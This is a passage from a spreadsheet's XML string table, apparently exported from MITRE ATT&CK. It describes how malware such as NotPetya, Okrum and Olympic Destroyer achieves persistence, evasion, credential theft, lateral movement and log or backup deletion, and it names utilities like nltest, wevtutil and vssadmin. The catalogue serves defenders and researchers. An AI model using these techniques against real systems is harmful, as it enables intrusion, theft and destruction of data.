    <t>[Netwalker](https://attack.mitre.org/software/S0457) can use Windows API functions to inject the ransomware DLL.(Citation: TrendMicro Netwalker May 2020)</t>
  </si>
  <si>
    <t>[Netwalker](https://attack.mitre.org/software/S0457)'s PowerShell script has been obfuscated with multiple layers including base64 and hexadecimal encoding and XOR-encryption, as well as obfuscated PowerShell functions and variables. [Netwalker](https://attack.mitre.org/software/S0457)'s DLL has also been embedded within the PowerShell script in hex format.(Citation: TrendMicro Netwalker May 2020)(Citation: Sophos Netwalker May 2020)</t>
  </si>
  <si>
    <t>[Netwalker](https://attack.mitre.org/software/S0457) has been written in PowerShell and executed directly in memory, avoiding detection.(Citation: TrendMicro Netwalker May 2020)(Citation: Sophos Netwalker May 2020)</t>
  </si>
  <si>
    <t>[Netwalker](https://attack.mitre.org/software/S0457) can detect and terminate active security software-related processes on infected systems.(Citation: TrendMicro Netwalker May 2020)</t>
  </si>
  <si>
    <t>[Netwalker](https://attack.mitre.org/software/S0457) can terminate system processes and services, some of which relate to backup software.(Citation: TrendMicro Netwalker May 2020)</t>
  </si>
  <si>
    <t>[Netwalker](https://attack.mitre.org/software/S0457) can determine the system architecture it is running on to choose which version of the DLL to use.(Citation: TrendMicro Netwalker May 2020)</t>
  </si>
  <si>
    <t>Operators deploying [Netwalker](https://attack.mitre.org/software/S0457) have used batch scripts to retrieve the [Netwalker](https://attack.mitre.org/software/S0457) payload.(Citation: Sophos Netwalker May 2020)</t>
  </si>
  <si>
    <t>[Netwalker](https://attack.mitre.org/software/S0457) can use WMI to delete Shadow Volumes.(Citation: TrendMicro Netwalker May 2020)</t>
  </si>
  <si>
    <t>[Ngrok](https://attack.mitre.org/software/S0508) can provide DGA for C2 servers through the use of random URL strings that change every 12 hours.(Citation: Zdnet Ngrok September 2018)</t>
  </si>
  <si>
    <t>[Ngrok](https://attack.mitre.org/software/S0508) has been used by threat actors to configure servers for data exfiltration.(Citation: MalwareBytes Ngrok February 2020)</t>
  </si>
  <si>
    <t>[Ngrok](https://attack.mitre.org/software/S0508) can tunnel RDP and other services securely over internet connections.(Citation: FireEye Maze May 2020)(Citation: Cyware Ngrok May 2019)(Citation: MalwareBytes Ngrok February 2020)(Citation: Trend Micro Ngrok September 2020)</t>
  </si>
  <si>
    <t>[Ngrok](https://attack.mitre.org/software/S0508) can be used to proxy connections to machines located behind NAT or firewalls.(Citation: MalwareBytes Ngrok February 2020)(Citation: Zdnet Ngrok September 2018)</t>
  </si>
  <si>
    <t>[Ngrok](https://attack.mitre.org/software/S0508) has been used by threat actors to proxy C2 connections to ngrok service subdomains.(Citation: Zdnet Ngrok September 2018)</t>
  </si>
  <si>
    <t>[Nidiran](https://attack.mitre.org/software/S0118) can download and execute files.(Citation: Symantec Backdoor.Nidiran)</t>
  </si>
  <si>
    <t>[Nidiran](https://attack.mitre.org/software/S0118) can create a new service named msamger (Microsoft Security Accounts Manager), which mimics the legitimate Microsoft database by the same name.(Citation: Symantec Backdoor.Nidiran)(Citation: Microsoft SAM)</t>
  </si>
  <si>
    <t>[Nidiran](https://attack.mitre.org/software/S0118) can create a new service named msamger (Microsoft Security Accounts Manager).(Citation: Symantec Backdoor.Nidiran)</t>
  </si>
  <si>
    <t>[Nltest](https://attack.mitre.org/software/S0359) may be used to enumerate trusted domains by using commands such as &lt;code&gt;nltest /domain_trusts&lt;/code&gt;.(Citation: Nltest Manual)(Citation: Fortinet TrickBot)</t>
  </si>
  <si>
    <t>[Nltest](https://attack.mitre.org/software/S0359) may be used to enumerate remote domain controllers using options such as &lt;code&gt;/dclist&lt;/code&gt; and &lt;code&gt;/dsgetdc&lt;/code&gt;.(Citation: Nltest Manual)</t>
  </si>
  <si>
    <t>[Nltest](https://attack.mitre.org/software/S0359) may be used to enumerate the parent domain of a local machine using &lt;code&gt;/parentdomain&lt;/code&gt;.(Citation: Nltest Manual)</t>
  </si>
  <si>
    <t>[NotPetya](https://attack.mitre.org/software/S0368) uses &lt;code&gt;wevtutil&lt;/code&gt; to clear the Windows event logs.(Citation: Talos Nyetya June 2017)(Citation: US District Court Indictment GRU Unit 74455 October 2020)</t>
  </si>
  <si>
    <t>[NotPetya](https://attack.mitre.org/software/S0368) encrypts user files and disk structures like the MBR with 2048-bit RSA.(Citation: Talos Nyetya June 2017)(Citation: US-CERT NotPetya 2017)(Citation: US District Court Indictment GRU Unit 74455 October 2020)</t>
  </si>
  <si>
    <t>[NotPetya](https://attack.mitre.org/software/S0368) can use two exploits in SMBv1, EternalBlue and EternalRomance, to spread itself to other remote systems on the network.(Citation: Talos Nyetya June 2017)(Citation: US-CERT NotPetya 2017)(Citation: US District Court Indictment GRU Unit 74455 October 2020)</t>
  </si>
  <si>
    <t>[NotPetya](https://attack.mitre.org/software/S0368) searches for files ending with dozens of different file extensions prior to encryption.(Citation: US District Court Indictment GRU Unit 74455 October 2020)</t>
  </si>
  <si>
    <t>[NotPetya](https://attack.mitre.org/software/S0368) contains a modified version of [Mimikatz](https://attack.mitre.org/software/S0002) to help gather credentials that are later used for lateral movement.(Citation: Talos Nyetya June 2017)(Citation: US-CERT NotPetya 2017)(Citation: NCSC Joint Report Public Tools)</t>
  </si>
  <si>
    <t>[NotPetya](https://attack.mitre.org/software/S0368) can use valid credentials with [PsExec](https://attack.mitre.org/software/S0029) or &lt;code&gt;wmic&lt;/code&gt; to spread itself to remote systems.(Citation: Talos Nyetya June 2017)(Citation: US-CERT NotPetya 2017)</t>
  </si>
  <si>
    <t>[NotPetya](https://attack.mitre.org/software/S0368) drops [PsExec](https://attack.mitre.org/software/S0029) with the filename dllhost.dat.(Citation: Talos Nyetya June 2017)</t>
  </si>
  <si>
    <t>[NotPetya](https://attack.mitre.org/software/S0368) uses &lt;code&gt;rundll32.exe&lt;/code&gt; to install itself on remote systems when accessed via [PsExec](https://attack.mitre.org/software/S0029) or &lt;code&gt;wmic&lt;/code&gt;.(Citation: Talos Nyetya June 2017)</t>
  </si>
  <si>
    <t>[NotPetya](https://attack.mitre.org/software/S0368) can use [PsExec](https://attack.mitre.org/software/S0029), which interacts with the &lt;code&gt;ADMIN$&lt;/code&gt; network share to execute commands on remote systems.(Citation: Talos Nyetya June 2017)(Citation: US-CERT NotPetya 2017)(Citation: PsExec Russinovich)</t>
  </si>
  <si>
    <t>[NotPetya](https://attack.mitre.org/software/S0368) creates a task to reboot the system one hour after infection.(Citation: Talos Nyetya June 2017)</t>
  </si>
  <si>
    <t>[NotPetya](https://attack.mitre.org/software/S0368) determines if specific antivirus programs are running on an infected host machine.(Citation: US District Court Indictment GRU Unit 74455 October 2020)</t>
  </si>
  <si>
    <t>[NotPetya](https://attack.mitre.org/software/S0368) can use [PsExec](https://attack.mitre.org/software/S0029) to help propagate itself across a network.(Citation: Talos Nyetya June 2017)(Citation: US-CERT NotPetya 2017)</t>
  </si>
  <si>
    <t>[NotPetya](https://attack.mitre.org/software/S0368) will reboot the system one hour after infection.(Citation: Talos Nyetya June 2017)(Citation: US District Court Indictment GRU Unit 74455 October 2020)</t>
  </si>
  <si>
    <t>[NotPetya](https://attack.mitre.org/software/S0368) can use &lt;code&gt;wmic&lt;/code&gt; to help propagate itself across a network.(Citation: Talos Nyetya June 2017)(Citation: US-CERT NotPetya 2017)</t>
  </si>
  <si>
    <t>[OLDBAIT](https://attack.mitre.org/software/S0138) collects credentials from several email clients.(Citation: FireEye APT28)</t>
  </si>
  <si>
    <t>[OLDBAIT](https://attack.mitre.org/software/S0138) collects credentials from Internet Explorer, Mozilla Firefox, and Eudora.(Citation: FireEye APT28)</t>
  </si>
  <si>
    <t>[OLDBAIT](https://attack.mitre.org/software/S0138) can use SMTP for C2.(Citation: FireEye APT28)</t>
  </si>
  <si>
    <t>[OLDBAIT](https://attack.mitre.org/software/S0138) installs itself in &lt;code&gt;%ALLUSERPROFILE%\\Application Data\Microsoft\MediaPlayer\updatewindws.exe&lt;/code&gt;; the directory name is missing a space and the file name is missing the letter "o."(Citation: FireEye APT28)</t>
  </si>
  <si>
    <t>[OLDBAIT](https://attack.mitre.org/software/S0138) obfuscates internal strings and unpacks them at startup.(Citation: FireEye APT28)</t>
  </si>
  <si>
    <t>[OLDBAIT](https://attack.mitre.org/software/S0138) can use HTTP for C2.(Citation: FireEye APT28)</t>
  </si>
  <si>
    <t>[OSInfo](https://attack.mitre.org/software/S0165) enumerates local and domain users(Citation: Symantec Buckeye)</t>
  </si>
  <si>
    <t xml:space="preserve">[OSInfo](https://attack.mitre.org/software/S0165) specifically looks for Domain Admins and power users within the domain.(Citation: Symantec Buckeye) </t>
  </si>
  <si>
    <t>[OSInfo](https://attack.mitre.org/software/S0165) has enumerated the local administrators group.(Citation: Symantec Buckeye)</t>
  </si>
  <si>
    <t>[OSInfo](https://attack.mitre.org/software/S0165) discovers shares on the network(Citation: Symantec Buckeye)</t>
  </si>
  <si>
    <t>[OSInfo](https://attack.mitre.org/software/S0165) queries the registry to look for information about Terminal Services.(Citation: Symantec Buckeye)</t>
  </si>
  <si>
    <t>[OSInfo](https://attack.mitre.org/software/S0165) performs a connection test to discover remote systems in the network(Citation: Symantec Buckeye)</t>
  </si>
  <si>
    <t>[OSInfo](https://attack.mitre.org/software/S0165) discovers information about the infected machine.(Citation: Symantec Buckeye)</t>
  </si>
  <si>
    <t>[OSInfo](https://attack.mitre.org/software/S0165) discovers the current domain information.(Citation: Symantec Buckeye)</t>
  </si>
  <si>
    <t>[OSInfo](https://attack.mitre.org/software/S0165) enumerates the current network connections similar to &lt;code&gt; net use &lt;/code&gt;.(Citation: Symantec Buckeye)</t>
  </si>
  <si>
    <t>[OSX/Shlayer](https://attack.mitre.org/software/S0402) can install malicious Safari browser extensions to serve ads.(Citation: Intego Shlayer Apr 2018)(Citation: Malwarebytes Crossrider Apr 2018)</t>
  </si>
  <si>
    <t>[OSX/Shlayer](https://attack.mitre.org/software/S0402) can base64-decode and AES-decrypt downloaded payloads.(Citation: Carbon Black Shlayer Feb 2019)</t>
  </si>
  <si>
    <t>Elevated Execution with Prompt</t>
  </si>
  <si>
    <t>[OSX/Shlayer](https://attack.mitre.org/software/S0402) can escalate privileges to root by asking the user for credentials.(Citation: Carbon Black Shlayer Feb 2019)</t>
  </si>
  <si>
    <t>[OSX/Shlayer](https://attack.mitre.org/software/S0402) executes a .command script from a hidden directory in a mounted DMG.(Citation: Carbon Black Shlayer Feb 2019)</t>
  </si>
  <si>
    <t>[OSX/Shlayer](https://attack.mitre.org/software/S0402) can use the &lt;code&gt;chmod&lt;/code&gt; utility to set a .app file as executable, and the &lt;code&gt;spctl&lt;/code&gt; application to disable Gatekeeper protection for a downloaded file.(Citation: Carbon Black Shlayer Feb 2019).(Citation: Carbon Black Shlayer Feb 2019)</t>
  </si>
  <si>
    <t>[OSX/Shlayer](https://attack.mitre.org/software/S0402) relies on users mounting and executing a malicious DMG file.(Citation: Carbon Black Shlayer Feb 2019)(Citation: Intego Shlayer Feb 2018)</t>
  </si>
  <si>
    <t>[OSX/Shlayer](https://attack.mitre.org/software/S0402) can masquerade as a Flash Player update.(Citation: Carbon Black Shlayer Feb 2019)(Citation: Intego Shlayer Feb 2018)</t>
  </si>
  <si>
    <t>[OSX/Shlayer](https://attack.mitre.org/software/S0402) can collect the macOS version and IOPlatformUUID.(Citation: Carbon Black Shlayer Feb 2019)</t>
  </si>
  <si>
    <t>[OSX/Shlayer](https://attack.mitre.org/software/S0402) can use bash scripts to check the macOS version and download payloads.(Citation: Carbon Black Shlayer Feb 2019)</t>
  </si>
  <si>
    <t>[OSX_OCEANLOTUS.D](https://attack.mitre.org/software/S0352) scrambles and encrypts data using AES256 before sending it to the C2 server.(Citation: TrendMicro MacOS April 2018)(Citation: Trend Micro MacOS Backdoor November 2020)</t>
  </si>
  <si>
    <t>[OSX_OCEANLOTUS.D](https://attack.mitre.org/software/S0352) has the ability to upload files from a compromised host..(Citation: Trend Micro MacOS Backdoor November 2020)</t>
  </si>
  <si>
    <t>[OSX_OCEANLOTUS.D](https://attack.mitre.org/software/S0352) has a command to delete a file from the system.(Citation: TrendMicro MacOS April 2018)(Citation: Trend Micro MacOS Backdoor November 2020)</t>
  </si>
  <si>
    <t>[OSX_OCEANLOTUS.D](https://attack.mitre.org/software/S0352) can delete the file quarantine attribute.(Citation: Trend Micro MacOS Backdoor November 2020)</t>
  </si>
  <si>
    <t>[OSX_OCEANLOTUS.D](https://attack.mitre.org/software/S0352) sets the main loader file’s attributes to hidden.(Citation: TrendMicro MacOS April 2018)</t>
  </si>
  <si>
    <t>[OSX_OCEANLOTUS.D](https://attack.mitre.org/software/S0352) has a command to download and execute a file on the victim’s machine.(Citation: TrendMicro MacOS April 2018)(Citation: Trend Micro MacOS Backdoor November 2020)</t>
  </si>
  <si>
    <t>[OSX_OCEANLOTUS.D](https://attack.mitre.org/software/S0352) can create a persistence file in the folder &lt;code&gt;/Library/LaunchAgents&lt;/code&gt;.(Citation: TrendMicro MacOS April 2018)(Citation: Trend Micro MacOS Backdoor November 2020)</t>
  </si>
  <si>
    <t>[OSX_OCEANLOTUS.D](https://attack.mitre.org/software/S0352) can create a persistence file in the folder &lt;code&gt;/Library/LaunchDaemons&lt;/code&gt;.(Citation: TrendMicro MacOS April 2018)</t>
  </si>
  <si>
    <t>[OSX_OCEANLOTUS.D](https://attack.mitre.org/software/S0352) has disguised its app bundle by adding special characters to the filename and using the icon for legitimate Word documents.(Citation: Trend Micro MacOS Backdoor November 2020)</t>
  </si>
  <si>
    <t>[OSX_OCEANLOTUS.D](https://attack.mitre.org/software/S0352) encrypts its strings in RSA256 and encodes them in a custom base64 scheme and XOR.(Citation: TrendMicro MacOS April 2018)</t>
  </si>
  <si>
    <t>[OSX_OCEANLOTUS.D](https://attack.mitre.org/software/S0352) uses PowerShell scripts.(Citation: TrendMicro MacOS April 2018)</t>
  </si>
  <si>
    <t>[OSX_OCEANLOTUS.D](https://attack.mitre.org/software/S0352) has a variant that is packed with UPX.(Citation: ESET OceanLotus macOS April 2019)</t>
  </si>
  <si>
    <t>[OSX_OCEANLOTUS.D](https://attack.mitre.org/software/S0352) has a variant that checks a number of system parameters to see if it is being run on real hardware or in a virtual machine environment.(Citation: ESET OceanLotus macOS April 2019)</t>
  </si>
  <si>
    <t>[OSX_OCEANLOTUS.D](https://attack.mitre.org/software/S0352) collects processor information, memory information, computer name, hardware UUID, serial number, and operating system version.(Citation: TrendMicro MacOS April 2018)(Citation: Trend Micro MacOS Backdoor November 2020)</t>
  </si>
  <si>
    <t>[OSX_OCEANLOTUS.D](https://attack.mitre.org/software/S0352) can collect the network interface MAC address on the infected host.(Citation: TrendMicro MacOS April 2018)(Citation: Trend Micro MacOS Backdoor November 2020)</t>
  </si>
  <si>
    <t>[OSX_OCEANLOTUS.D](https://attack.mitre.org/software/S0352) can use the touch command to change timestamps.(Citation: Trend Micro MacOS Backdoor November 2020)</t>
  </si>
  <si>
    <t>[OSX_OCEANLOTUS.D](https://attack.mitre.org/software/S0352) can use shell script to execute malicious code.(Citation: Trend Micro MacOS Backdoor November 2020)</t>
  </si>
  <si>
    <t>[OSX_OCEANLOTUS.D](https://attack.mitre.org/software/S0352) uses Word macros for execution.(Citation: TrendMicro MacOS April 2018)</t>
  </si>
  <si>
    <t>[OSX_OCEANLOTUS.D](https://attack.mitre.org/software/S0352) can use HTTP POST and GET requests to send and receive C2 information.(Citation: Trend Micro MacOS Backdoor November 2020)</t>
  </si>
  <si>
    <t>[OceanSalt](https://attack.mitre.org/software/S0346) can delete files from the system.(Citation: McAfee Oceansalt Oct 2018)</t>
  </si>
  <si>
    <t>[OceanSalt](https://attack.mitre.org/software/S0346) can extract drive information from the endpoint and search files on the system.(Citation: McAfee Oceansalt Oct 2018)</t>
  </si>
  <si>
    <t>[OceanSalt](https://attack.mitre.org/software/S0346) can encode data with a NOT operation before sending the data to the control server.(Citation: McAfee Oceansalt Oct 2018)</t>
  </si>
  <si>
    <t>[OceanSalt](https://attack.mitre.org/software/S0346) can collect the name and ID for every process running on the system.(Citation: McAfee Oceansalt Oct 2018)</t>
  </si>
  <si>
    <t>[OceanSalt](https://attack.mitre.org/software/S0346) has been delivered via spearphishing emails with Microsoft Office attachments.(Citation: McAfee Oceansalt Oct 2018)</t>
  </si>
  <si>
    <t>[OceanSalt](https://attack.mitre.org/software/S0346) can collect the computer name from the system.(Citation: McAfee Oceansalt Oct 2018)</t>
  </si>
  <si>
    <t>[OceanSalt](https://attack.mitre.org/software/S0346) can collect the victim’s IP address.(Citation: McAfee Oceansalt Oct 2018)</t>
  </si>
  <si>
    <t>[OceanSalt](https://attack.mitre.org/software/S0346) can create a reverse shell on the infected endpoint using cmd.exe.(Citation: McAfee Oceansalt Oct 2018) [OceanSalt](https://attack.mitre.org/software/S0346) has been executed via malicious macros.(Citation: McAfee Oceansalt Oct 2018)</t>
  </si>
  <si>
    <t>[Octopus](https://attack.mitre.org/software/S0340) collects information on the Windows directory and searches for compressed RAR files on the host.(Citation: Securelist Octopus Oct 2018)</t>
  </si>
  <si>
    <t>[Octopus](https://attack.mitre.org/software/S0340) can upload and download files to and from the victim’s machine.(Citation: Securelist Octopus Oct 2018)</t>
  </si>
  <si>
    <t>[Octopus](https://attack.mitre.org/software/S0340) can capture screenshots of the victims’ machine.(Citation: Securelist Octopus Oct 2018)</t>
  </si>
  <si>
    <t>[Octopus](https://attack.mitre.org/software/S0340) encodes C2 communications in Base64.(Citation: Securelist Octopus Oct 2018)</t>
  </si>
  <si>
    <t>[Octopus](https://attack.mitre.org/software/S0340) collects system drive information, the computer name, and the size of the disk.(Citation: Securelist Octopus Oct 2018)</t>
  </si>
  <si>
    <t>[Octopus](https://attack.mitre.org/software/S0340) collects the host IP address from the victim’s machine.(Citation: Securelist Octopus Oct 2018)</t>
  </si>
  <si>
    <t>[Octopus](https://attack.mitre.org/software/S0340) collects the username from the victim’s machine.(Citation: Securelist Octopus Oct 2018)</t>
  </si>
  <si>
    <t>[Octopus](https://attack.mitre.org/software/S0340) uses HTTP for C2 communications.(Citation: Securelist Octopus Oct 2018)</t>
  </si>
  <si>
    <t>[Octopus](https://attack.mitre.org/software/S0340) uses wmic.exe for local discovery information.(Citation: Securelist Octopus Oct 2018)</t>
  </si>
  <si>
    <t>[Okrum](https://attack.mitre.org/software/S0439) has used a custom implementation of AES encryption to encrypt collected data.(Citation: ESET Okrum July 2019)</t>
  </si>
  <si>
    <t>[Okrum](https://attack.mitre.org/software/S0439) was seen using a RAR archiver tool to compress/decompress data.(Citation: ESET Okrum July 2019)</t>
  </si>
  <si>
    <t>[Okrum](https://attack.mitre.org/software/S0439) was seen using modified Quarks PwDump to perform credential dumping.(Citation: ESET Okrum July 2019)</t>
  </si>
  <si>
    <t>[Okrum](https://attack.mitre.org/software/S0439)'s loader can decrypt the backdoor code, embedded within the loader or within a legitimate PNG file. A custom XOR cipher or RC4 is used for decryption.(Citation: ESET Okrum July 2019)</t>
  </si>
  <si>
    <t>Data exfiltration is done by [Okrum](https://attack.mitre.org/software/S0439) using the already opened channel with the C2 server.(Citation: ESET Okrum July 2019)</t>
  </si>
  <si>
    <t>[Okrum](https://attack.mitre.org/software/S0439) can identify proxy servers configured and used by the victim, and use it to make HTTP requests to C2 its server.(Citation: ESET Okrum July 2019)</t>
  </si>
  <si>
    <t>[Okrum](https://attack.mitre.org/software/S0439)'s backdoor deletes files after they have been successfully uploaded to C2 servers.(Citation: ESET Okrum July 2019)</t>
  </si>
  <si>
    <t>[Okrum](https://attack.mitre.org/software/S0439) has used DriveLetterView to enumerate drive information.(Citation: ESET Okrum July 2019)</t>
  </si>
  <si>
    <t>Before exfiltration, [Okrum](https://attack.mitre.org/software/S0439)'s backdoor has used hidden files to store logs and outputs from backdoor commands.(Citation: ESET Okrum July 2019)</t>
  </si>
  <si>
    <t>[Okrum](https://attack.mitre.org/software/S0439) has built-in commands for uploading, downloading, and executing files to the system.(Citation: ESET Okrum July 2019)</t>
  </si>
  <si>
    <t>[Okrum](https://attack.mitre.org/software/S0439) was seen using a keylogger tool to capture keystrokes. (Citation: ESET Okrum July 2019)</t>
  </si>
  <si>
    <t>[Okrum](https://attack.mitre.org/software/S0439) was seen using MimikatzLite to perform credential dumping.(Citation: ESET Okrum July 2019)</t>
  </si>
  <si>
    <t>[Okrum](https://attack.mitre.org/software/S0439) can establish persistence by adding a new service NtmsSvc with the display name Removable Storage to masquerade as a legitimate Removable Storage Manager.(Citation: ESET Okrum July 2019)</t>
  </si>
  <si>
    <t>[Okrum](https://attack.mitre.org/software/S0439) mimics HTTP protocol for C2 communication, while hiding the actual messages in the Cookie and Set-Cookie headers of the HTTP requests.(Citation: ESET Okrum July 2019)</t>
  </si>
  <si>
    <t xml:space="preserve">[Okrum](https://attack.mitre.org/software/S0439) establishes persistence by creating a .lnk shortcut to itself in the Startup folder.(Citation: ESET Okrum July 2019) </t>
  </si>
  <si>
    <t>[Okrum](https://attack.mitre.org/software/S0439)'s installer can attempt to achieve persistence by creating a scheduled task.(Citation: ESET Okrum July 2019)</t>
  </si>
  <si>
    <t>[Okrum](https://attack.mitre.org/software/S0439)'s loader can create a new service named NtmsSvc to execute the payload.(Citation: ESET Okrum July 2019)</t>
  </si>
  <si>
    <t>[Okrum](https://attack.mitre.org/software/S0439) can establish persistence by creating a .lnk shortcut to itself in the Startup folder.(Citation: ESET Okrum July 2019)</t>
  </si>
  <si>
    <t>[Okrum](https://attack.mitre.org/software/S0439) has used base64 to encode C2 communication.(Citation: ESET Okrum July 2019)</t>
  </si>
  <si>
    <t>[Okrum](https://attack.mitre.org/software/S0439)'s payload is encrypted and embedded within its loader, or within a legitimate PNG file.(Citation: ESET Okrum July 2019)</t>
  </si>
  <si>
    <t>[Okrum](https://attack.mitre.org/software/S0439) uses AES to encrypt network traffic. The key can be hardcoded or negotiated with the C2 server in the registration phase. (Citation: ESET Okrum July 2019)</t>
  </si>
  <si>
    <t>[Okrum](https://attack.mitre.org/software/S0439)'s loader can check the amount of physical memory and terminates itself if the host has less than 1.5 Gigabytes of physical memory in total.(Citation: ESET Okrum July 2019)</t>
  </si>
  <si>
    <t>[Okrum](https://attack.mitre.org/software/S0439) can collect computer name, locale information, and information about the OS and architecture.(Citation: ESET Okrum July 2019)</t>
  </si>
  <si>
    <t>[Okrum](https://attack.mitre.org/software/S0439) can collect network information, including the host IP address, DNS, and proxy information.(Citation: ESET Okrum July 2019)</t>
  </si>
  <si>
    <t>[Okrum](https://attack.mitre.org/software/S0439) was seen using NetSess to discover NetBIOS sessions.(Citation: ESET Okrum July 2019)</t>
  </si>
  <si>
    <t>[Okrum](https://attack.mitre.org/software/S0439) can collect the victim username.(Citation: ESET Okrum July 2019)</t>
  </si>
  <si>
    <t>[Okrum](https://attack.mitre.org/software/S0439) can obtain the date and time of the compromised system.(Citation: ESET Okrum July 2019)</t>
  </si>
  <si>
    <t>[Okrum](https://attack.mitre.org/software/S0439)'s loader can detect presence of an emulator by using two calls to GetTickCount API, and checking whether the time has been accelerated.(Citation: ESET Okrum July 2019)</t>
  </si>
  <si>
    <t>[Okrum](https://attack.mitre.org/software/S0439) can impersonate a logged-on user's security context using a call to the ImpersonateLoggedOnUser API.(Citation: ESET Okrum July 2019)</t>
  </si>
  <si>
    <t>User Activity Based Checks</t>
  </si>
  <si>
    <t xml:space="preserve">[Okrum](https://attack.mitre.org/software/S0439) loader only executes the payload after the left mouse button has been pressed at least three times, in order to avoid being executed within virtualized or emulated environments.(Citation: ESET Okrum July 2019) </t>
  </si>
  <si>
    <t>[Okrum](https://attack.mitre.org/software/S0439) uses HTTP for communication with its C2.(Citation: ESET Okrum July 2019)</t>
  </si>
  <si>
    <t>[Okrum](https://attack.mitre.org/software/S0439)'s backdoor has used cmd.exe to execute arbitrary commands as well as batch scripts to update itself to a newer version.(Citation: ESET Okrum July 2019)</t>
  </si>
  <si>
    <t>To establish persistence, [Okrum](https://attack.mitre.org/software/S0439) can install itself as a new service named NtmSsvc.(Citation: ESET Okrum July 2019)</t>
  </si>
  <si>
    <t>[Olympic Destroyer](https://attack.mitre.org/software/S0365) will attempt to clear the System and Security event logs using &lt;code&gt;wevtutil&lt;/code&gt;.(Citation: Talos Olympic Destroyer 2018)</t>
  </si>
  <si>
    <t>[Olympic Destroyer](https://attack.mitre.org/software/S0365) contains a module that tries to obtain stored credentials from web browsers.(Citation: Talos Olympic Destroyer 2018)</t>
  </si>
  <si>
    <t xml:space="preserve">[Olympic Destroyer](https://attack.mitre.org/software/S0365) overwrites files locally and on remote shares.(Citation: Talos Olympic Destroyer 2018)(Citation: US District Court Indictment GRU Unit 74455 October 2020) </t>
  </si>
  <si>
    <t>[Olympic Destroyer](https://attack.mitre.org/software/S0365) uses the native Windows utilities &lt;code&gt;vssadmin&lt;/code&gt;, &lt;code&gt;wbadmin&lt;/code&gt;, and &lt;code&gt;bcdedit&lt;/code&gt; to delete and disable operating system recovery features such as the Windows backup catalog and Windows Automatic Repair.(Citation: Talos Olympic Destroyer 2018)</t>
  </si>
  <si>
    <t>[Olympic Destroyer](https://attack.mitre.org/software/S0365) contains a module that tries to obtain credentials from LSASS, similar to [Mimikatz](https://attack.mitre.org/software/S0002). These credentials are used with [PsExec](https://attack.mitre.org/software/S0029) and [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) to help the malware propagate itself across a network.(Citation: Talos Olympic Destroyer 2018)</t>
  </si>
  <si>
    <t>[Olympic Destroyer](https://attack.mitre.org/software/S0365) attempts to copy itself to remote machines on the network.(Citation: Talos Olympic Destroyer 2018)</t>
  </si>
  <si>
    <t>[Olympic Destroyer](https://attack.mitre.org/software/S0365) will attempt to enumerate mapped network shares to later attempt to wipe all files on those shares.(Citation: Talos Olympic Destroyer 2018)</t>
  </si>
  <si>
    <t>[Olympic Destroyer](https://attack.mitre.org/software/S0365) uses [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) to enumerate all systems in the network.(Citation: Talos Olympic Destroyer 2018)</t>
  </si>
  <si>
    <t>[Olympic Destroyer](https://attack.mitre.org/software/S0365) uses [PsExec](https://attack.mitre.org/software/S0029) to interact with the &lt;code&gt;ADMIN$&lt;/code&gt; network share to execute commands on remote systems.(Citation: Talos Olympic Destroyer 2018)(Citation: PsExec Russinovich)</t>
  </si>
  <si>
    <t>[Olympic Destroyer](https://attack.mitre.org/software/S0365) utilizes [PsExec](https://attack.mitre.org/software/S0029) to help propagate itself across a network.(Citation: Talos Olympic Destroyer 2018)</t>
  </si>
  <si>
    <t>[Olympic Destroyer](https://attack.mitre.org/software/S0365) uses the API call &lt;code&gt;ChangeServiceConfigW&lt;/code&gt; to disable all services on the affected system.(Citation: Talos Olympic Destroyer 2018)</t>
  </si>
  <si>
    <t>[Olympic Destroyer](https://attack.mitre.org/software/S0365) uses API calls to enumerate the infected system's ARP table.(Citation: Talos Olympic Destroyer 2018)</t>
  </si>
  <si>
    <t>[Olympic Destroyer](https://attack.mitre.org/software/S0365) will shut down the compromised system after it is done modifying system configuration settings.(Citation: Talos Olympic Destroyer 2018)(Citation: US District Court Indictment GRU Unit 74455 October 2020)</t>
  </si>
  <si>
    <t>[Olympic Destroyer](https://attack.mitre.org/software/S0365) uses WMI to help propagate itself across a network.(Citation: Talos Olympic Destroyer 2018)</t>
  </si>
  <si>
    <t>[OnionDuke](https://attack.mitre.org/software/S0052) can use a custom decryption algorithm to decrypt strings.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>[OnionDuke](https://attack.mitre.org/software/S0052) has the capability to use a Denial of Service module.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>[OnionDuke](https://attack.mitre.org/software/S0052) steals credentials from its victims.(Citation: F-Secure The Dukes)</t>
  </si>
  <si>
    <t>[OnionDuke](https://attack.mitre.org/software/S0052) uses Twitter as a backup C2.(Citation: F-Secure The Dukes)</t>
  </si>
  <si>
    <t>[OnionDuke](https://attack.mitre.org/software/S0052) uses HTTP and HTTPS for C2.(Citation: F-Secure The Dukes)</t>
  </si>
  <si>
    <t>[OopsIE](https://attack.mitre.org/software/S0264) compresses collected files with a simple character replacement scheme before sending them to its C2 server.(Citation: Unit 42 OopsIE! Feb 2018)</t>
  </si>
  <si>
    <t>[OopsIE](https://attack.mitre.org/software/S0264) compresses collected files with GZipStream before sending them to its C2 server.(Citation: Unit 42 OopsIE! Feb 2018)</t>
  </si>
  <si>
    <t>[OopsIE](https://attack.mitre.org/software/S0264) exfiltrates command output and collected files to its C2 server in 1500-byte blocks.(Citation: Unit 42 OopsIE! Feb 2018)</t>
  </si>
  <si>
    <t>[OopsIE](https://attack.mitre.org/software/S0264) concatenates then decompresses multiple resources to load an embedded .Net Framework assembly.(Citation: Unit 42 OopsIE! Feb 2018)</t>
  </si>
  <si>
    <t>[OopsIE](https://attack.mitre.org/software/S0264) can upload files from the victim's machine to its C2 server.(Citation: Unit 42 OopsIE! Feb 2018)</t>
  </si>
  <si>
    <t>[OopsIE](https://attack.mitre.org/software/S0264) has the capability to delete files and scripts from the victim's machine.(Citation: Unit 42 OilRig Sept 2018)</t>
  </si>
  <si>
    <t>[OopsIE](https://attack.mitre.org/software/S0264) can download files from its C2 server to the victim's machine.(Citation: Unit 42 OopsIE! Feb 2018)(Citation: Unit 42 OilRig Sept 2018)</t>
  </si>
  <si>
    <t>[OopsIE](https://attack.mitre.org/software/S0264) stages the output from command execution and collected files in specific folders before exfiltration.(Citation: Unit 42 OopsIE! Feb 2018)</t>
  </si>
  <si>
